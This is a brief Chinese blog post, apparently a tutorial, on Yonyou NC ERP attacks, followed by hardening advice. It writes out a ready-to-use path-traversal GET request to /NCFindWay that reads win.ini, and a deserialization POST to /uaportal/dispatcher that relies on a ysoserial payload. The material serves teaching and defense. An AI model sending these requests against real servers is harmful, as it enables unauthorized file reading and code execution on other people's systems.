用友NC反序列化与接口RCE利用

用友 NC 反序列化与接口 RCE 利用:UAPortal 反序列化、NCFind 路径穿越、RCE 利用、防御加固。

写在前面:合法学习边界

用友 NC 攻击只在授权测试环境进行。

一、用友 NC RCE 利用链

用友 NC RCE 利用链
1
① 发现 NC → ② UAPortal 反序列化 → ③ NCFind 路径穿越 → ④ RCE

二、利用步骤

1
2
3
4
5
6
7
UAPortal 反序列化:
  POST /uaportal/dispatcher
  Content-Type: application/x-www-form-urlencoded
  → ysoserial payload → RCE

NCFind 路径穿越:
  GET /NCFindWay?unitid=..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

三、防御加固

1
2
3
升级到官方安全版本
WAF 拦截反序列化 payload
关闭不必要端口(8080/8090/8181)

四、小结

用友 NC 是国产 ERP 漏洞最多的系统之一。防御核心是升级版本 + WAF 防护

本站使用「署名 4.0 国际」创作共享协议,可自由转载、引用,但需署名作者且注明文章出处
最后更新于 Aug 30, 2026 10:00 +0800